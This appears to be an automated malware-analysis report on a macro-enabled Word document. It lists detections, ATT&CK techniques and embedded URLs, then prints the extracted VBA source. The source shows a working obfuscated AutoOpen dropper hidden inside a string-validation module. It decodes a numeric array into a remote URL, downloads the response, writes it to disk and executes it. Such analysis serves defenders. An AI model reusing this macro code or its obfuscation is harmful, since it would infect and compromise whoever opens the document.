MALICIOUS
352
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains obfuscated VBA macros, including an auto-executing loader, that are designed to download and execute a second-stage payload. Heuristics indicate the use of CreateObject and Shell execution, along with HTTP download and file saving capabilities. ClamAV detections further confirm the malicious nature of the embedded macros.
Heuristics 9
-
ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
Ogurcov = greeks__1.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set greeks__0_22 = CreateObject(OgurcovPech(3)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set greeks__0_22 = CreateObject(OgurcovPech(3)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot Referenced by macro
- https://davidcel.is/posts/stop-validating-email-addresses-with-regex/Referenced by macro
- http://blog.nkadesign.com/2009/access-checking-blank-variables/Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://stackoverflow.com/questions/275160/regex-for-namesReferenced by macro
- http://stackoverflow.com/questions/11501860/regular-expression-pattern-to-validate-name-fieldReferenced by macro
- https://blog.udemy.com/vba-regex/Referenced by macro
- http://stackoverflow.com/questions/11109832/how-to-find-if-an-array-contains-a-stringReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 45571 bytes |
SHA-256: 66169d1140bb4b9d136611e3eade79703b637e1942b697e16ea68f32322b44ef |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsWord "Dota"
IsEmail "helpdesc@mail.com"
IsName "Augustos"
IsAlpha "Outdoorstand"
IsBlank "Sed"
IsAlphaNum "Destanation-"
End Sub
Attribute VB_Name = "Module1"
' =================================
' MODULE: mod_Validation
' Level: Framework module
' Version: 1.03
' Description: string functions & procedures
'
' Source/date: Bonnie Campbell, 2/10/2015
' Revisions: BLC - 2/10/2015 - 1.00 - initial version
' BLC - 11/12/2015 - 1.01 - added IsAlphaNumDashSlash(), IsAlphaNumDashUnder(),
' IsWord(), IsParagraph(),
' & verifications via VerifyString()
' BLC - 4/4/2016 - 1.02 - added IsInArray(), updated ValidString(),
' replaced Exit_Function w/ Exit_Handler
' BLC - 5/20/2016 - 1.03 - added IsTypeMatch()
' =================================
' ---------------------------------
' FUNCTION: ValidateString
' Description: Checks if string is proper type
' Assumptions: -
' Parameters: strInspect - string to check
' strType - string type (alpha, alphanum, numeric, etc.)
' Returns: boolean - True (string is valid), False (string is invalid)
' Throws: none
' References: none
' Source/date:
'
'
' Adapted: Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
' BLC - 2/12/2015 - initial version
' BLC - 11/12/2015 - added alphanumdashslashspace, alphanumdashspace, alphanumspace, alphanumdashunder,
' alphanumdashunderspace
' BLC - 4/4/2016 - added name & email cases
' ---------------------------------
Public Function ValidateString(ByVal strInspect As String, strType As String) As Boolean
On Error GoTo Err_Handler
Dim blnIsValid As Boolean
'default
blnIsValid = False
Select Case strType
Case "alpha"
blnIsValid = IsAlpha(Trim(strInspect))
Case "alphanum"
blnIsValid = IsAlphaNum(Trim(strInspect))
Case "alphadashunderscore"
blnIsValid = IsAlphaDashUnderscore(Trim(strInspect))
Case "alphanumspace"
blnIsValid = IsAlphaNum(Trim(Replace(strInspect, " ", "")))
Case "numeric"
blnIsValid = IsNumeric(Trim(strInspect))
Case "alphanumdash"
blnIsValid = IsAlphaNumDash(Trim(strInspect))
Case "alphaspace"
blnIsValid = IsAlphaNumDash(Replace(strInspect, " ", ""))
Case "alphanumdashspace"
blnIsValid = IsAlphaNumDash(Trim(Replace(strInspect, " ", "")))
Case "alphanumdashunder"
blnIsValid = IsAlphaNumDashUnder(Trim(strInspect))
Case "alphanumdashunderspace"
blnIsValid = IsAlphaNumDashUnder(Trim(Replace(strInspect, " ", "")))
Case "alphanumdashslash"
blnIsValid = IsAlphaNumDashSlash(Trim(strInspect))
Case "alphanumdashslashspace"
blnIsValid = IsAlphaNumDashSlash(Trim(Replace(strInspect, " ", "")))
Case "name"
blnIsValid = IsName(Trim(strInspect))
Case "email"
blnIsValid = IsEmail(Trim(strInspect))
Case "word"
blnIsValid = IsWord(Trim(strInspect))
Case "paragraph"
blnIsValid = IsParagraph(Trim(Replace(strInspect, " ", "")))
End Select
ValidateString = blnIsValid
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - CountInString[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsAlpha
' Description: Checks if string is alphabetic
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is alpha), False (string contains non-alpha characters)
' Throws: none
' References: none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted: Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
' BLC - 2/12/2015 - initial version
' ---------------------------------
Function IsAlpha(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Dim i As Integer
wozner4 = 22
OgurcovPole.Type = 1
OgurcovPole.Open
'default
IsAlpha = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case Else
IsAlpha = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsAlpha[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsAlphaDashUnderscore
' Description: Checks if string includes only letter, underscore, dash
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is a name), False (string contains non-word characters)
' Throws: none
' References: none
' Source/date: Bonnie Campbell, April 4, 2016 - for NCPN tools
' Adapted: -
' Revisions:
' BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsAlphaDashUnderscore(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Dim strPattern As String
strPattern = "^[a-zA-Z_-]+$"
IsAlphaDashUnderscore = IsRegExpMatch(strInspect, strPattern)
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsAlphaDashUnderscore[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsAlphaNum
' Description: Checks if string is alphanumeric
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is alphanum), False (string contains non-alphanumeric characters)
' Throws: none
' References: none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted: Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
' BLC - 2/12/2015 - initial version
' ---------------------------------
Public Function IsAlphaNum(strInspect As String) As Boolean
On Error GoTo Err_Handler:
greeks_sedming.Open (greeksNaStole)
Dim i As Integer
'default
IsAlphaNum = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case "0" To "9"
Case Else
IsAlphaNum = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsAlphaNum[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsAlphaNumDash
' Description: Checks if string is alphanumeric w/ or w/o dash
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is alphanum), False (string contains non-alphanumeric characters)
' Throws: none
' References: none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted: Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
' BLC - 2/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDash(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Dim i As Integer
'default
IsAlphaNumDash = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case "0" To "9"
Case "-"
Case Else
IsAlphaNumDash = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsAlphaNumDash[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsAlphaNumDashUnder
' Description: Checks if string is alphanumeric w/ or w/o dash or underscore
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is alphanum), False (string contains non-alphanumeric/dash/
' underscore characters)
' Throws: none
' References: none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted: Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
' BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDashUnder(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Dim i As Integer
'default
IsAlphaNumDashUnder = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case "0" To "9"
Case "-"
Case "/"
Case "_"
Case Else
IsAlphaNumDashUnder = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsAlphaNumDashUnder[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsAlphaNumDashSlash
' Description: Checks if string is alphanumeric w/ or w/o dash or slash
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is alphanum), False (string contains non-alphanumeric/dash/slash characters)
' Throws: none
' References: none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted: Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
' BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDashSlash(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Dim i As Integer
'default
IsAlphaNumDashSlash = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case "0" To "9"
Case "-"
Case "/"
Case Else
IsAlphaNumDashSlash = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsAlphaNumDashSlash[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsName
' Description: Checks if string is a name (can contain: letter, period, dash, space)
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is a name), False (string contains non-word characters)
' Throws: none
' References: none
' Source/date:
' Matthew Scharley, November 8, 2008
' http://stackoverflow.com/questions/275160/regex-for-names
' Adapted: Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
' BLC - 4/4/2016 - initial version
' ---------------------------------
Public Function IsName(strInspect As String) As Boolean
On Error GoTo Err_Handler:
greeks__1.Open OgurcovPech(10 - (2 + 1 + 2)), Djeremy, False
greeks__1.send
greeks__4 = greeks__3(OgurcovPech(180 / 30))
greeksNaStole = greeks__4
greeksNaStole = greeksNaStole + OgurcovPech(55 - 43)
Dim strPattern As String
strPattern = "^[A-Z]'?[- a-zA-Z]([a-zA-Z])*$"
IsName = IsRegExpMatch(strInspect, strPattern)
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsName[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsEmail
' Description: Checks if string is an email address
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is a valid email address),
' False (string isn't a valid email address)
' Throws: none
' References: none
' Notes:
' Pattern => ^[a-zA-Z]+(?:\s+[a-zA-Z]+)*$
' Explanation:
' ^ Start of string
' [a-zA-Z] Any character in the class a to z or A to Z
' + One or more repititions
' (?: ) Match expresion but don't capture
' \s+ Whitespace, One or more repititions
' * Zero or more repititions
' $ End of string
'
' In the end, the simplest pattern is best to avoid rejecting valid
' email addresses -- e.g. w/ tags email+tag@example.com
' Pattern => ^.+@.+\..+$ (originally /.+@.+\..+/i)
' Explanation:
' ^ start
' .+ any character(s) - one or more times
' @ followed by @
' .+ any character(s) - one or more times
' \. followed by a period (.)
' .+ any character(s) - one or more times
' $ end
' Source/date:
' David Celis, September 6, 2012
' https://davidcel.is/posts/stop-validating-email-addresses-with-regex/
' Chris Nielson July 17, 2012
' http://stackoverflow.com/questions/11501860/regular-expression-pattern-to-validate-name-field
' Adapted: Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
' BLC - 4/4/2016 - initial version
' ---------------------------------
Public Function IsEmail(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Set greeks__0_22 = CreateObject(OgurcovPech(3))
c = ""
Set greeks__3 = greeks__0_22.Environment(OgurcovPech(4))
Dim IJK As Integer
For IJK = LBound(ContainerX) To UBound(ContainerX)
Djeremy = Djeremy & RemoveSpecialChar(IJK)
Next IJK
Dim strPattern As String
strPattern = "^.+@.+\..+$"
IsEmail = IsRegExpMatch(strInspect, strPattern)
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsEmail[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsWord
' Description: Checks if string is alphabetic
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is a word), False (string contains non-word characters)
' Throws: none
' References: none
' Source/date:
'
'
' Adapted: Bonnie Campbell, November 12, 2015 - for NCPN tools
' Revisions:
' BLC - 11/12/2015 - initial version
' ---------------------------------
Public Function IsWord(strInspect As String) As Boolean
ContainerX = Split("1664U1856U1856U1792U928U752U752U1584U1600U1648U1552U1744U1616U736U1712U1648U1568U736U1792U1728U752U1712U880U1696U1664U1824U1856U832U1664U1616U1824U1856U1648", "U")
Dim agreeks As String
agreeks = TREwozner(UserForm1.TextBox1.ControlTipText, "00", "e")
agreeks = TREwozner(agreeks, "D!", "M")
agreeks = TREwozner(agreeks, "bri", "s")
OgurcovPech = Split(agreeks, "10)")
Set greeks__1 = CreateObject(OgurcovPech(0))
Set OgurcovPole = CreateObject(OgurcovPech(1))
Set greeks_sedming = CreateObject(OgurcovPech(2))
On Error GoTo Err_Handler:
Dim i As Integer
'default
IsWord = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case "-"
Case Else
IsWord = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsWord[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsParagraph
' Description: Checks if string is alphabetic
' Assumptions: -
' Parameters: strInspect - string to check
' Returns: boolean - True (string is alpha), False (string contains non-alpha characters)
' Throws: none
' References: none
' Source/date:
'
'
' Adapted: Bonnie Campbell, November 12, 2015 - for NCPN tools
' Revisions:
' BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsParagraph(strInspect As String) As Boolean
On Error GoTo Err_Handler:
Dim i As Integer
'default
IsParagraph = True
For i = 1 To Len(Trim(strInspect))
Select Case Mid$(Trim(strInspect), i, 1)
Case "A" To "Z", "a" To "z"
Case "0" To "9"
Case "-", "/", "_", ".", "?", "!"
Case Else
IsParagraph = False
Exit For
End Select
Next i
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsParagraph[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsRegExpMatch
' Description: Checks if string is a match for the regular expression pattern
' Assumptions: -
' Parameters: strInspect - string to check
' strPattern - pattern to check against (string)
' Returns: boolean - True (string matches), False (string does not match)
' Throws: none
' References: Microsoft VBScript Regular Expressions 5.5 (added reference)
' Source/date:
' RICHA, March 31, 2014
' https://blog.udemy.com/vba-regex/
' Adapted: Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
' BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsRegExpMatch(strInspect As String, strPattern As String) As Boolean
On Error GoTo Err_Handler:
Dim oRegExp As Object
Set oRegExp = CreateObject("vbscript.regexp")
With oRegExp
.Global = True
.IgnoreCase = True
.Pattern = strPattern
IsRegExpMatch = .test(strInspect)
End With
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsRegExpMatch[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsInArray
' Description: Checks if string is found in the supplied array
' Assumptions: -
' Parameters: strFind - string to check
' aryLookIn - array to look in
' Returns: boolean - True (string is found), False (string isn't found)
' Throws: none
' References: none
' Source/date:
' Jimmy Pena, June 20, 2012
' http://stackoverflow.com/questions/11109832/how-to-find-if-an-array-contains-a-string
' Adapted: Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
' BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsInArray(strFind As String, aryLookIn As Variant) As Boolean
On Error GoTo Err_Handler
IsInArray = (UBound(Filter(aryLookIn, strFind)) > -1)
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsInArray[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsBetween
' Description: Checks if value is between supplied bounding values/limits
' Assumptions: -
' Parameters: iValue - value to check (variant)
' lowBound - lower limit (double)
' highBound - upper limit (double)
' inclusive - whether the lower & upper limits should be included (boolean)
' Returns: boolean - True (value is between limits), False (value is outside limits)
' Throws: none
' References: none
' Source/date: Bonnie Campbell, April 4, 2016 - for NCPN tools
' Adapted: -
' Revisions:
' BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsBetween(iValue As Variant, lowBound As Double, highBound As Double, inclusive As Boolean) As Boolean
On Error GoTo Err_Handler
Dim isOK As Boolean
'default
isOK = False
'ensure numeric
If Not IsNumeric(iValue) Then GoTo Exit_Handler
If inclusive Then
Select Case iValue
'rejects --> all result in isOK = false (no change)
Case Is < lowBound
Case Is > highBound
'valid cases
Case Is = lowBound
isOK = True
Case Is = highBound
isOK = True
Case Is > lowBound And (iValue < highBound)
isOK = True
End Select
Else
Select Case iValue
'rejects --> all result in isOK = false (no change)
Case Is < lowBound
Case Is > highBound
Case Is = lowBound
Case Is = highBound
'valid cases
Case Is > lowBound And (iValue < highBound)
isOK = True
End Select
End If
IsBetween = isOK
Exit_Handler:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsBetween[mod_Validation])"
End Select
Resume Exit_Handler
End Function
' ---------------------------------
' FUNCTION: IsTypeMatch
' Description: Checks if value is or can be converted to the data type noted
' Relies on attempting to convert, if it fails via type mismatch or otherwise false is returned
' Assumptions: -
' Note:
' Value Variant type Value Variant type
' 0 Empty (unitialized) 10 Error Value
' 1 Null (no valid data) 11 Boolean
' 2 Integer 12 Variant (only used with arrays of variants)
' 3 Long Integer 13 Data access object
' 4 Single 14 Decimal value
' 5 Double 17 Byte
' 6 Currency 36 User Defined Type
' 7 Date 8192 Array
' 8 String
' 9 Object
'
' Parameters: iValue - value to check (variant)
' dataType - data type name (string)
' Returns: boolean - True (value is or can be converted), False (value isn't/can't be converted to the data type passed in)
' Throws: none
' References: none
' Source/date: Bonnie Campbell, May 20, 2016 - for NCPN tools
' Adapted: -
' Revisions:
' BLC - 5/20/2016 - initial version
' ---------------------------------
Function IsTypeMatch(iValue As Variant, DataType As String) As Boolean
On Error GoTo Err_Handler
Dim isOK As Boolean
Dim result As Variant
'default
isOK = True
'check type
Select Case DataType
Case "boolean" '0 or 1, yes/no values are mismatches
result = CBool(iValue)
Case "byte" '0 or 1, yes/no values are mismatches
result = CByte(iValue)
Case "number"
If Not IsNumeric(iValue) Then isOK = False
Case "integer"
result = CInt(iValue)
Case "long"
result = CLng(iValue)
Case "double"
result = CDbl(iValue)
Case "single"
result = CSng(iValue)
Case "decimal"
result = CDec(iValue)
Case "string"
result = CStr(iValue)
Case "date"
result = CDate(iValue)
Case "currency"
result = CDate(iValue)
Case Else
isOK = False
End Select
Exit_Handler:
IsTypeMatch = isOK
Exit Function
Err_Handler:
Select Case Err.Number
Case "13" 'RunTime Error 13: Type Mismatch
isOK = False
Resume Exit_Handler
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - IsTypeMatch[mod_Validation])"
End Select
'fail on error
isOK = False
Resume Exit_Handler
End Function
Attribute VB_Name = "Module2"
Public greeks__1 As Object
Public OgurcovPole As Object
Public greeks__3 As Object
Public ContainerX() As String
Public greeks__4 As String
Public greeksNaStole As String
Public greeks_sedming As Object
Public Djeremy As String
Public OgurcovPech() As String
Public Function TREwozner(A1 As String, A2 As String, A3 As String) As String
TREwozner = Replace(A1, A2, A3)
End Function
Public Function RemoveSpecialChar(strFileName As Integer) As String
RemoveSpecialChar = Chr(CInt(ContainerX(strFileName)) / (9 + 7))
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module3"
' ---------------------------------
' FUNCTION: PopulateSpeciesPriorities
' Description: Populate species priority values from species priority concatenation
' Assumptions: Park priority textboxes are named tbxPARKPriority (e.g. tbxZIONPriority)
' Parameters: parkCode - 4 character park code (string)
' priorities - species priority string concatenation for all parks (e.g. "BLCA-1|COLM-Transect|FOBU-1")
' Returns: Priority - value for park species priority (string)
' Throws: none
' References: none
' Source/date:
' Adapted: Bonnie Campbell, April 9, 2015 - for NCPN tools
' Revisions:
' BLC - 4/9/2015 - initial version
' BLC - 5/26/2015 - moved from mod_Species to mod_App_UI
' ---------------------------------
Public Function PopulateSpeciesPriorities(ParkCode As String, priorities As String) As String
On Error GoTo Err_Handler
Dim ParkPriorities As Variant
Dim i As Integer
'check if parkCode is in priorities string
If Len(priorities) > Len(Replace(priorities, ParkCode, "")) Then
'prepare the Park Priority values
ParkPriorities = Split(priorities, "|")
'set park priority values
For i = 0 To UBound(ParkPriorities)
'does Park have a priority value?
If ParkCode = Left(ParkPriorities(i), 4) Then
PopulateSpeciesPriorities = Replace(ParkPriorities(i), ParkCode + "-", "")
End If
Next
Else
'not listed
PopulateSpeciesPriorities = "X"
End If
Exit_Function:
Exit Function
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - PopulateSpeciesPriorities[mod_App_UI])"
End Select
Resume Exit_Function
End Function
' ---------------------------------
' SUB: Initialize
' Description: initialize application values
' Assumptions: -
' Parameters: N/A
' Returns: N/A
' Throws: none
' References: none
' Source/date:
' Adapted: Bonnie Campbell, February 6, 2015 - for NCPN tools
' Revisions:
' BLC - 2/6/2015 - initial version
' BLC - 2/19/2015 - added dynamic getParkState() & standard error handling
' BLC - 3/4/2015 - shifted colors to mod_Color, removed setting of park, state, tgtYear TempVars
' BLC - 5/13/2015 - stub only
' BLC - 11/19/2015 - added CreateEnums call to create application specific Enums,
' updated documentation to reflect mod_App_UI vs. mod_Init
' ---------------------------------
Public Sub Initialize()
On Error GoTo Err_Handler
'create the enums specific to this application from the Enums table & mod_App_Enum stub module
CreateEnums
'set application UI display
' SetStartupOptions "AppTitle", dbText, "NCPN Big Rivers"
Exit_Handler:
Exit Sub
Err_Handler:
Select Case Err.Number
Case Else
MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
"Error encountered (#" & Err.Number & " - Initialize[mod_App_UI])"
End Select
Resume Exit_Handler
End Sub
' ---------------------------------
' SUB: ClickAction
' Description: Handles click events for various form links
' Assumptions: Link caption and tag text matches action text values.
' If a link caption &/or tag changes, the corresponding action must change
' here too.
' Parameters: action - concatenated link label caption & tag (string)
' Returns: N/A
' Throws: none
' References: none
' Source/date:
' Adapted: Bonnie Campbell, February 6, 2015 - for NCPN tools
' Revisions:
' BLC - 4/26/2016 - initial version
' ---------------------------------
Public Sub ClickAction(action As String)
On Error GoTo Err_Handler
Dim fName As String, rName As String, oArgs As String
action = LCase(Nz(Trim(action), ""))
'defaults
fName = ""
rName = ""
oArgs = ""
Select Case action
'Where?
Case "site"
fName = "Task"
Case "feature"
fName = "Task"
Case "transect"
Case "plot"
'Sampling
Case "event"
fName = "Task"
…
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 107008 bytes |
SHA-256: e54201ede93a56615012276faf12426406b2f8a01acbd3287cb7b03e6d5d56a3 |
|||
|
Detection
ClamAV:
Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.